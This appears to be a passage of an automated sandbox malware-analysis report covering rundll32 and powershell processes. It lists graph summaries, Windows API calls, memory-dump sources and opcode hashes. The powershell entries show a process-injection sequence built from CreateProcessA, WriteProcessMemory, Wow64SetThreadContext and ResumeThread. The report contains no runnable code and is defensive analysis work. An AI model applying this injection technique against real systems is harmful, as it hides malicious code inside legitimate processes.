                                                            • Execution graph (rendered figure; node layout and edges not recoverable as text). Entry nodes: 4ea85a8 -> 4ea85ed (MessageBoxW), 4ea63c8 (DuplicateHandle), 4ea69df -> 4ea6238 -> 4ea7bc0 / 4ea7bb0 -> 4ea6394 -> 4ea7cb0 (EnumThreadWindows), 4e4d01c -> 4e4d030 -> 4ea0848 / 4ea0874 / 4ea0838 -> 4ea4db5 (OleInitialize) -> 4ea5730 -> 4ea4d28 (OleInitialize) -> 4ea6228 -> 4ea630c -> 4ea6df0 (OleInitialize)

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4ea63c1-4ea6482, DuplicateHandle called from block 4ea63c8-4ea645c
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EA644F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 775b027ffc9d4ef4b0e1d3f3c2422165daa151ffacb3bd337280e6c36b29c948
                                                            • Instruction ID: c6f1db283c1c7e77d4966a5cffd87657dbd16003e1c1715ee668f0d220062d42
                                                            • Opcode Fuzzy Hash: 775b027ffc9d4ef4b0e1d3f3c2422165daa151ffacb3bd337280e6c36b29c948
                                                            • Instruction Fuzzy Hash: 8021E5B5900309DFDB10CFAAD884ADEBBF8FB48720F14841AE958A7250D374A954CFA5

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4ea63c8-4ea6482, DuplicateHandle called from block 4ea63c8-4ea645c
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EA644F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 9a84ff9bf4c957e4bc268fc67f7a00f0f46867f96300f455efd70288f35280dc
                                                            • Instruction ID: 4f4c5aabf86306c2c91ef5e63fe72821fb8a9e220e9885d0bfbd0c02f1b797ea
                                                            • Opcode Fuzzy Hash: 9a84ff9bf4c957e4bc268fc67f7a00f0f46867f96300f455efd70288f35280dc
                                                            • Instruction Fuzzy Hash: 6821E4B59003099FDB10CFAAD884ADEFBF8FB48310F14801AE958A7310D378A950CF65

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4ea6394-4ea7d64, EnumThreadWindows called from block 4ea7cfe-4ea7d2e
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,04EA7C90,061F40EC,?), ref: 04EA7D21
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 7913fe523227443081e020972e101fe04c22c0e9e33bfd5e704cf53a63f40b9e
                                                            • Instruction ID: 9d75e2e51974047e8175be889fd85e477ee0dcf03af92fa3bc40876fd4a34a04
                                                            • Opcode Fuzzy Hash: 7913fe523227443081e020972e101fe04c22c0e9e33bfd5e704cf53a63f40b9e
                                                            • Instruction Fuzzy Hash: A421F9B1900249DFDB14DF9AC844BEEFBF5FB88320F14842AD854A7250D778A945CFA5

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4ea7ca9-4ea7d64, EnumThreadWindows called from block 4ea7cfe-4ea7d2e
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,04EA7C90,061F40EC,?), ref: 04EA7D21
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 760ea7c2d90ff62a9cca5f8b6d8f9ba2c67c19e57b30485c1abd47a66045bbd2
                                                            • Instruction ID: 8df2a9429651b38a89b5bf9a0d7a6b17149470815857bf2251bfe2fbd4696648
                                                            • Opcode Fuzzy Hash: 760ea7c2d90ff62a9cca5f8b6d8f9ba2c67c19e57b30485c1abd47a66045bbd2
                                                            • Instruction Fuzzy Hash: 582127719002098FDB14CFAAC844BEEFBF9FB88320F14842AD814A7250D778A945CFA5

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4ea85a0-4ea864f, MessageBoxW called from block 4ea85ff-4ea8632
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 04EA8625
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 9bdbb3e85f43c80860d3228babac98644f41d35e848bd302f5e226c9f27817fa
                                                            • Instruction ID: 2350c79035b6f2fed8521bb2f869dc5d3e679faed545db89bb0472b4e86ae7d4
                                                            • Opcode Fuzzy Hash: 9bdbb3e85f43c80860d3228babac98644f41d35e848bd302f5e226c9f27817fa
                                                            • Instruction Fuzzy Hash: 8721E2B5C003499FDB14DF9AD984ADEFBF5FB88314F14892ED818A7210C375A944CBA5

                                                            Control-flow Graph
                                                            • Rendered graph (executed / not executed block colouring not recoverable as text); basic blocks 4ea85a8-4ea864f, MessageBoxW called from block 4ea85ff-4ea8632
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 04EA8625
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 8f761f7b92606f25b76dd902a693c003b16ecbcfa53eb3db4d3bf266b1440612
                                                            • Instruction ID: c1c664170aacfa4d48e4ad41ea40422e24ffd666c5529a657c533e70f46725c4
                                                            • Opcode Fuzzy Hash: 8f761f7b92606f25b76dd902a693c003b16ecbcfa53eb3db4d3bf266b1440612
                                                            • Instruction Fuzzy Hash: 9D2102B5C003499FDB14DF9AD884ADEFBF5FB88314F14892ED818A7200C375A944CBA5

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 4ea6de8 to 4ea6e78, one path through the OleInitialize call
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 04EA6E45
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 82b116b353a18f8b718cdd41ea33b91c61920e4aac5687acf4cdd3d2a846fdec
                                                            • Instruction ID: 8f755d715e83ffc3d42da0b4444a4256959c1844851d9d85a5ec95d12b397876
                                                            • Opcode Fuzzy Hash: 82b116b353a18f8b718cdd41ea33b91c61920e4aac5687acf4cdd3d2a846fdec
                                                            • Instruction Fuzzy Hash: 0B1145B5800349CFDB20CFAAD449BDEFBF8EB49724F208419D558A7600C378A644CFA5

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 4ea6328 to 4ea6e78, one path through the OleInitialize call
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 04EA6E45
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635915719.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4ea0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: fb4240fea61dd210c8e3dad78b5e3786577724a1870b4c3f7be8cfbfbf8fc414
                                                            • Instruction ID: 6a748b906ca95858b9e46d78e49a55774ed6e9b39ceff600399878a3c03779b1
                                                            • Opcode Fuzzy Hash: fb4240fea61dd210c8e3dad78b5e3786577724a1870b4c3f7be8cfbfbf8fc414
                                                            • Instruction Fuzzy Hash: 951145B4900349CFDB20DFAAC444BDEFBF4EB48324F248419D558A7210D378A940CFA5
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4bd2838abb7b2b2264b50204f6839d8a3b94f27078230b45ec1689e5b3a89be
                                                            • Instruction ID: 53349870f22ef5eeca105e3204f5a12d791fe1a174fd7da63d017248e92ce652
                                                            • Opcode Fuzzy Hash: b4bd2838abb7b2b2264b50204f6839d8a3b94f27078230b45ec1689e5b3a89be
                                                            • Instruction Fuzzy Hash: BB21C0B5604344DFEB05DF24ED84F26BBA5FBC4628F20C66DD8494B741C37AE846C6A2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 556ad57ce388ec47e5f5be8efa67d0e0d9fb4bec1f07fd0d867bcb76610df5f8
                                                            • Instruction ID: e399c342fb9db62912e911c10507a64aa1e61e7fcb6e43091a2dd394928425d7
                                                            • Opcode Fuzzy Hash: 556ad57ce388ec47e5f5be8efa67d0e0d9fb4bec1f07fd0d867bcb76610df5f8
                                                            • Instruction Fuzzy Hash: C11129B16043449FDB14EF24FD84F26BB96F7C4614F208A6DD4494B241D37AE447C662
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01ed16035e2bf7f4e546f4a3e7223dff2ec818e7f6a04972967f64033ad1f07f
                                                            • Instruction ID: b902f99674d542206be67df882254511fa1680927cfa32a4ab3f7df7683af877
                                                            • Opcode Fuzzy Hash: 01ed16035e2bf7f4e546f4a3e7223dff2ec818e7f6a04972967f64033ad1f07f
                                                            • Instruction Fuzzy Hash: 6911A77150D7C08FD716DF24E984B15BF71EB81214F2486EEC4898B693C33A944BC762
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.1635597106.0000000004E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E4D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4e4d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction ID: d9c26312a5cbeb9aa9b17a5cdcc0a21bc818dbe013b4a389713dc572286266c8
                                                            • Opcode Fuzzy Hash: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction Fuzzy Hash: 6311A375504684CFD711DF14EAC4B16FBA1FBC4728F24C6AAD8494B756C33AE40ACB92

                                                            Execution Graph

                                                            Execution Coverage:5.4%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:52
                                                            Total number of Limit Nodes:1
                                                            Execution graph (rendering not captured in text): entry nodes 44f69df, 449d01c, 44f63c8 and 44f85a8; API calls reached along the graph: EnumThreadWindows, OleInitialize, DuplicateHandle, MessageBoxW

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f6387 to 44f6482, one path through the DuplicateHandle call
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 044F644F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 8ede23ac35237c3ec7550a5a745764fc394bbaf84cfae7550cba9db02313fc2e
                                                            • Instruction ID: 0f415da962c050d9638f44b37f0e0bfc3e251fec643a97a2d69564a988342775
                                                            • Opcode Fuzzy Hash: 8ede23ac35237c3ec7550a5a745764fc394bbaf84cfae7550cba9db02313fc2e
                                                            • Instruction Fuzzy Hash: DF318BB58053899FDB12CFA9D884ADEFFF4AF49310F14405AE994A7312D334A945CFA1

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f63c8 to 44f6482, one path through the DuplicateHandle call
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 044F644F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 7446cccf7e7472829f7822a1fc5dcd48c4cbf424d6d75d227ddac874b807f6b3
                                                            • Instruction ID: f3aa8aef29276c38c602d37704958c3657216be6b546a292c83daf5e999a9de2
                                                            • Opcode Fuzzy Hash: 7446cccf7e7472829f7822a1fc5dcd48c4cbf424d6d75d227ddac874b807f6b3
                                                            • Instruction Fuzzy Hash: CE21E4B59002099FDB10CFAAD884BDEFBF5FB48310F14801AE918A3310D378A940CFA5

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f6394 to 44f7d64, one path through the EnumThreadWindows call
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,044F7C90,057640EC,?), ref: 044F7D21
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: bbcc100487f9b8bfa1cd8926e3fc407961c670a50631950051bf2f529bdd0304
                                                            • Instruction ID: 5ea27af9552d84b00d72b6432a29fd266e656e67f808abeadc5fdfc9b8e53161
                                                            • Opcode Fuzzy Hash: bbcc100487f9b8bfa1cd8926e3fc407961c670a50631950051bf2f529bdd0304
                                                            • Instruction Fuzzy Hash: B32138B1900249CFDB10DF9AC844BEEFBF5EB88320F10842AD914A3250D778A941CFA4

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f7ca9 to 44f7d64, one path through the EnumThreadWindows call
                                                            APIs
                                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E70,?,?,044F7C90,057640EC,?), ref: 044F7D21
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: EnumThreadWindows
                                                            • String ID:
                                                            • API String ID: 2941952884-0
                                                            • Opcode ID: 44589a6e57e0aa31f5ebca299bda6efea7206cb500dbe8390316d18fae128817
                                                            • Instruction ID: 7da35f8237e6cfcf9fd232140e701e3389faa050e32298d5c274d4748f855dfc
                                                            • Opcode Fuzzy Hash: 44589a6e57e0aa31f5ebca299bda6efea7206cb500dbe8390316d18fae128817
                                                            • Instruction Fuzzy Hash: 8E2115B1D002498FEB14DFAAC844BEEFBF5AB88320F14842AD554A3350D778A945CFA4

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f85a0 to 44f864f, one path through the MessageBoxW call
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 044F8625
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 5be0237ec0a433bf76e0b9128fd95c1630ad78f0cb01c953032021267204ad0c
                                                            • Instruction ID: 2700d837925219ac94423b6c7767ca0d2efe965c60f8ce2b31eaff41ba8b98db
                                                            • Opcode Fuzzy Hash: 5be0237ec0a433bf76e0b9128fd95c1630ad78f0cb01c953032021267204ad0c
                                                            • Instruction Fuzzy Hash: E321F0B68003499FDB14DF9AD984ADEFBF5FB88310F10852ED918AB200C375A545CFA5

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f85a8 to 44f864f, one path through the MessageBoxW call
                                                            APIs
                                                            • MessageBoxW.USER32(?,00000000,00000000,?), ref: 044F8625
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Message
                                                            • String ID:
                                                            • API String ID: 2030045667-0
                                                            • Opcode ID: 9b66c8043774609482ed9aee6ece8f7917f4ecac894d9cc433a8adedc2360803
                                                            • Instruction ID: dc62b361a3395b1146bef237a48bdff47b677d671de7eb7a6cc6633790c0380f
                                                            • Opcode Fuzzy Hash: 9b66c8043774609482ed9aee6ece8f7917f4ecac894d9cc433a8adedc2360803
                                                            • Instruction Fuzzy Hash: 9E21DEB68003499FDB14DF9AD884ADEBBB5FB88310F10852AE918AB600C375A544CBA5

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f6de8 to 44f6e78, one path through the OleInitialize call
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 044F6E45
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 9f50547a6facb81923e7a2cf63f98eecd4722563cc261d6432278af2c3fffe04
                                                            • Instruction ID: 29e88c669f2b2ebb974a82b0ad6b81bb4375401786be05d0ad7254688879ee90
                                                            • Opcode Fuzzy Hash: 9f50547a6facb81923e7a2cf63f98eecd4722563cc261d6432278af2c3fffe04
                                                            • Instruction Fuzzy Hash: 981106B58003498FDB20DFAAD445BDEBBF8AB48324F20845AD519A3600D778A545CFA5

                                                            Control-flow Graph (graph image and executed/not-executed colouring not captured in text): basic blocks 44f6328 to 44f6e78, one path through the OleInitialize call
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 044F6E45
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587409599.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_44f0000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: cb98d2da2fcf19e57de4015be26488cadca33a4d7224d65fa4f1309f9c786ab6
                                                            • Instruction ID: 0564500bfc1a3766dfe5b4a2e39dace4d4593c69f7fbcce04b6578a1ea7f4c6e
                                                            • Opcode Fuzzy Hash: cb98d2da2fcf19e57de4015be26488cadca33a4d7224d65fa4f1309f9c786ab6
                                                            • Instruction Fuzzy Hash: 2C1115B5904349CFDB20DFAAD844BDEBBF4EB48324F10845AD619A7300D778A945CFA5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd444fb4ab0bc5805beb3bdc6e4ddec011a6cf2f79d1bdd058cddabd9262ce6b
                                                            • Instruction ID: f70d6feb020eb21a602665a55079b93cb9a486906a42f94b4ca80d3c016b86a3
                                                            • Opcode Fuzzy Hash: dd444fb4ab0bc5805beb3bdc6e4ddec011a6cf2f79d1bdd058cddabd9262ce6b
                                                            • Instruction Fuzzy Hash: 0B2101F6A043009FDF10DF14D981B26BFE5FBC4615F20C66AD8094B345C33AA806D662
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2012d7e2e50db393964b8efb09f0a9b8034b5694117a053d2d28a0cd6053809a
                                                            • Instruction ID: 57ce53257c7b7929e089a4a0a20e698187ec6ccb4c70d2e8142c0dc9285d3845
                                                            • Opcode Fuzzy Hash: 2012d7e2e50db393964b8efb09f0a9b8034b5694117a053d2d28a0cd6053809a
                                                            • Instruction Fuzzy Hash: 001129F1A04344AFDF20EF24E984B26BFD5F784618F208A6ED5494B341D33AE847D662
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c7a428f2c4c0ac317edb68ae38e6b68b8c4de39b6ff00c12851a07f04003c7d
                                                            • Instruction ID: 417974f26712f62bce223d07d9ddc4f91669e4052acc027648130146700dad8e
                                                            • Opcode Fuzzy Hash: 5c7a428f2c4c0ac317edb68ae38e6b68b8c4de39b6ff00c12851a07f04003c7d
                                                            • Instruction Fuzzy Hash: 501194B19097C09FDF12DF24D584715BFB1EB41214F2485EBC4898B293C33A984AC762
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1587046836.000000000449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0449D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_449d000_rundll32.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction ID: 993c65467a41bf2f3cf8bc1ab27734765ea9ceac0878fe7ffb8e99d6b642c7a5
                                                            • Opcode Fuzzy Hash: c03dd1bcb53228d952643459f3bf3f1e843205499364677cf0536b0fd951d8f4
                                                            • Instruction Fuzzy Hash: 4A11C4B6904644CFDB01CF14D6C0716FFA1FB84315F24C66AD8494B756C339E80ACB51

                                                            Execution Graph

                                                            Execution Coverage:5.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:19
                                                            Total number of Limit Nodes:1
                                                            execution_graph (rendered graph; edge list omitted): entry 3745978 -> 374599e, which branches to 3745e04, Wow64SetThreadContext (37465b0, 37465a8), WriteProcessMemory (3746740, 3746748), 37469c5 and 37469d0 (each reaching CreateProcessA at 3746a59), 3746500 (reaching ResumeThread at 3746540) and 37464f8 (reaching ResumeThread at 3746500)

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 7d32760; no API calls annotated in the graph
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1619713096.0000000007D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_7d30000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 84Ml$84Ml
                                                            • API String ID: 0-199424134
                                                            • Opcode ID: cc42939fc87648c3afb82f2b89635193b360f0ecf8a594254f2507614066dac9
                                                            • Instruction ID: 72a496e7807e4377a2765d3e1734b5792b2a24cbaec394d192aa3462bf3641de
                                                            • Opcode Fuzzy Hash: cc42939fc87648c3afb82f2b89635193b360f0ecf8a594254f2507614066dac9
                                                            • Instruction Fuzzy Hash: E202F6B1F002199FDB24DF68D844BAAFBA2FFC9311F14C0AAD9558B251DB31E941C7A1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 37469c5; CreateProcessA is called from block 3746b5f-3746c19, and subroutine 37405bc is called from blocks 3746cb0-3746cb3, 3746cc4-3746cc7 and 3746cd8-3746cdb
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03746C06
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 7d57b58a312e48d555e80b324766d736836673ac9c604c0f691878865a29f9d5
                                                            • Instruction ID: eb7648fa5d916508b8892c02badc34b5a72711dcdc57d9595841c5b04cd6dfd1
                                                            • Opcode Fuzzy Hash: 7d57b58a312e48d555e80b324766d736836673ac9c604c0f691878865a29f9d5
                                                            • Instruction Fuzzy Hash: 4CA15C71E007198FEB24DF68C8817EEBBB2FF49314F1485A9D818A7240DB75A985CF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 37469d0; CreateProcessA is called from block 3746b5f-3746c19, and subroutine 37405bc is called from blocks 3746cb0-3746cb3, 3746cc4-3746cc7 and 3746cd8-3746cdb
                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 03746C06
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1587411359.0000000003740000.00000040.00000800.00020000.00000000.sdmp, Offset: 03740000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_3740000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 71b34fb6ddcee7eec46a3af6b03e39cb35372143b1e54d91b28f7faf528b062b
                                                            • Instruction ID: 5a5b673caeab62c94f47423d2edb8338e9f195250c74ce9f9f216582aa37604e
                                                            • Opcode Fuzzy Hash: 71b34fb6ddcee7eec46a3af6b03e39cb35372143b1e54d91b28f7faf528b062b
                                                            • Instruction Fuzzy Hash: F5914C71E007198FEB24DF68C8817EEBBB2FF49314F1485A9D818A7240DB75A985CF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph (rendered graph; node list omitted): function starting at 3746740; WriteProcessMemory is called from block 37467a6-37467e5
                                                            APIs
